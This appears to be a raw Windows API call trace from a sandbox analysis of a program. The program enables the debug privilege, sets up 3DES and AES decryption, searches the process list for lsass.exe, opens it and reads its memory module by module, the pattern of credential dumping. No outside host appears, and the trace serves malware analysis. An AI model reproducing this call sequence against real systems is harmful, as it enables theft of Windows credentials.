MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f3a0, cbMultiByte=256, lpWideCharStr=0x28f070, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0018.419] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0018.419] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x28ee60, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0018.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x28f5a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0018.419] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13f3457b8) returned 0x0 [0018.419] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x98120, dwRevision=0x1 | out: pSecurityDescriptor=0x98120) returned 1 [0018.419] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x98120, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x98120) returned 1 [0018.420] CreateFileW (lpFileName="\\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}" (normalized: "\\device\\namedpipe\\{2fdfcf81-bd74-41c3-9115-f628925cc568}"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x28f990, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c [0018.420] RtlGetNtVersionNumbers () returned 0x4c [0018.420] RtlAdjustPrivilege (in: Privilege=0x14, NewValue=1, ForThread=0, OldValue=0x28fa00 | out: OldValue=0x28fa00) returned 0x0 [0018.421] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.421] GetProcAddress (hModule=0x76c70000, lpProcName="LoadLibraryW") returned 0x76c86f80 [0018.421] LoadLibraryW (lpLibFileName="bcrypt") returned 0x7fefc700000 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x7fefc702640 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptSetProperty") returned 0x7fefc705160 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptGetProperty") returned 0x7fefc701510 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptGenerateSymmetricKey") returned 0x7fefc701aa0 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptEncrypt") returned 0x7fefc701130 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptDecrypt") returned 0x7fefc701030 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptDestroyKey") returned 0x7fefc7016a0 [0018.438] GetProcAddress (hModule=0x7fefc700000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x7fefc7032b0 [0018.438] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x13f350980, pszAlgId="3DES", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x13f350980) returned 0x0 [0018.450] BCryptSetProperty (in: hObject=0x9c3a0, pszProperty="ChainingMode", pbInput=0x13f34bd08, cbInput=0x20, dwFlags=0x0 | out: hObject=0x9c3a0) returned 0x0 [0018.450] BCryptGetProperty (in: hObject=0x9c3a0, pszProperty="ObjectLength", pbOutput=0x13f350998, cbOutput=0x4, pcbResult=0x28f760, dwFlags=0x0 | out: pbOutput=0x13f350998, pcbResult=0x28f760) returned 0x0 [0018.450] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.450] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.450] LocalAlloc (uFlags=0x40, uBytes=0x1fa) returned 0x9c4c0 [0018.450] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x13f350940, pszAlgId="AES", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x13f350940) returned 0x0 [0018.450] BCryptSetProperty (in: hObject=0x9cc30, pszProperty="ChainingMode", pbInput=0x13f34bd70, cbInput=0x20, dwFlags=0x0 | out: hObject=0x9cc30) returned 0x0 [0018.450] BCryptGetProperty (in: hObject=0x9cc30, pszProperty="ObjectLength", pbOutput=0x13f350958, cbOutput=0x4, pcbResult=0x28f760, dwFlags=0x0 | out: pbOutput=0x13f350958, pcbResult=0x28f760) returned 0x0 [0018.450] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.450] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.450] LocalAlloc (uFlags=0x40, uBytes=0x26e) returned 0x9cd50 [0018.450] RtlInitUnicodeString (in: DestinationString=0x28f820, SourceString="lsass.exe" | out: DestinationString="lsass.exe") [0018.451] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.451] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.451] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0x9cfd0 [0018.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9cfd0, Length=0x1000, ResultLength=0x0 | out: SystemInformation=0x9cfd0, ResultLength=0x0) returned 0xc0000004 [0018.451] LocalFree (hMem=0x9cfd0) returned 0x0 [0018.451] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.451] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.451] LocalAlloc (uFlags=0x40, uBytes=0x2000) returned 0x9cfd0 [0018.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9cfd0, Length=0x2000, ResultLength=0x0 | out: SystemInformation=0x9cfd0, ResultLength=0x0) returned 0xc0000004 [0018.451] LocalFree (hMem=0x9cfd0) returned 0x0 [0018.451] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.451] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.451] LocalAlloc (uFlags=0x40, uBytes=0x4000) returned 0x9cfd0 [0018.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9cfd0, Length=0x4000, ResultLength=0x0 | out: SystemInformation=0x9cfd0, ResultLength=0x0) returned 0xc0000004 [0018.452] LocalFree (hMem=0x9cfd0) returned 0x0 [0018.452] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.452] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.452] LocalAlloc (uFlags=0x40, uBytes=0x8000) returned 0x9cfd0 [0018.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9cfd0, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x9cfd0, ResultLength=0x0) returned 0xc0000004 [0018.452] LocalFree (hMem=0x9cfd0) returned 0x0 [0018.452] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.452] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.452] LocalAlloc (uFlags=0x40, uBytes=0x10000) returned 0x9cfd0 [0018.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x9cfd0, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x9cfd0, ResultLength=0x0) returned 0x0 [0018.453] RtlEqualUnicodeString (String1=0x9d008, String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="System", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="smss.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="csrss.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="wininit.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="csrss.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="winlogon.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="services.exe", String2="lsass.exe", CaseInsensitive=1) returned 0 [0018.453] RtlEqualUnicodeString (String1="lsass.exe", String2="lsass.exe", CaseInsensitive=1) returned 1 [0018.453] LocalFree (hMem=0x9cfd0) returned 0x0 [0018.453] OpenProcess (dwDesiredAccess=0x1010, bInheritHandle=0, dwProcessId=0x1e0) returned 0x60 [0018.453] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.453] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.453] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x9c6d0 [0018.453] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.453] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.453] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x9ae10 [0018.453] NtQueryInformationProcess (in: ProcessHandle=0x60, ProcessInformationClass=0x0, ProcessInformation=0x28f570, ProcessInformationLength=0x30, ReturnLength=0x28f5e0 | out: ProcessInformation=0x28f570, ReturnLength=0x28f5e0) returned 0x0 [0018.453] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fffffd7000, lpBuffer=0x28f650, nSize=0x20, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f650*, lpNumberOfBytesRead=0x0) returned 1 [0018.453] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76ec2640, lpBuffer=0x28f750, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f750*, lpNumberOfBytesRead=0x0) returned 1 [0018.453] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x524a0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.454] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.454] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.454] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9ae30 [0018.454] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x52336, lpBuffer=0x9ae30, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.454] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0xffb60000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.454] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.454] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.454] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.454] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0xffb600f0, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.521] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.521] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.521] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.521] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0xffb600f0, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.521] LocalFree (hMem=0x9ac20) returned 0x0 [0018.521] LocalFree (hMem=0x9ac40) returned 0x0 [0018.521] LocalFree (hMem=0x9ae30) returned 0x0 [0018.521] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x52590, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.521] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.521] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.521] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9ae30 [0018.521] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76ea53f8, lpBuffer=0x9ae30, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76d90000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.522] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.522] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76d900e0, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.522] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.522] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76d900e0, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] LocalFree (hMem=0x9ac20) returned 0x0 [0018.522] LocalFree (hMem=0x9ac40) returned 0x0 [0018.522] LocalFree (hMem=0x9ae30) returned 0x0 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x52910, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.522] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.522] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x98330 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x528e8, lpBuffer=0x98330, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x98330*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76c70000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.522] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.522] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ae30 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76c700e8, lpBuffer=0x9ae30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.522] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.522] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.522] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76c700e8, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.522] LocalFree (hMem=0x9ae30) returned 0x0 [0018.522] LocalFree (hMem=0x9ac20) returned 0x0 [0018.522] LocalFree (hMem=0x98330) returned 0x0 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x52a80, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.523] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.523] LocalAlloc (uFlags=0x40, uBytes=0x1e) returned 0x98330 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x52a58, lpBuffer=0x98330, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x98330*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd000000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.523] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.523] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ae30 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0000f0, lpBuffer=0x9ae30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.523] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.523] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0000f0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] LocalFree (hMem=0x9ae30) returned 0x0 [0018.523] LocalFree (hMem=0x9ac20) returned 0x0 [0018.523] LocalFree (hMem=0x98330) returned 0x0 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x537b0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.523] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.523] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x9ae30 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x53788, lpBuffer=0x9ae30, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe970000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.523] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.523] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.523] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.523] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe9700e8, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.524] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.524] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe9700e8, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] LocalFree (hMem=0x9ac20) returned 0x0 [0018.524] LocalFree (hMem=0x9ac40) returned 0x0 [0018.524] LocalFree (hMem=0x9ae30) returned 0x0 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x539e0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.524] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.524] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x9ae30 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x539b8, lpBuffer=0x9ae30, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe440000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.524] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.524] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe4400f0, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.524] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.524] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe4400f0, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] LocalFree (hMem=0x9ac20) returned 0x0 [0018.524] LocalFree (hMem=0x9ac40) returned 0x0 [0018.524] LocalFree (hMem=0x9ae30) returned 0x0 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x53ef0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.524] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 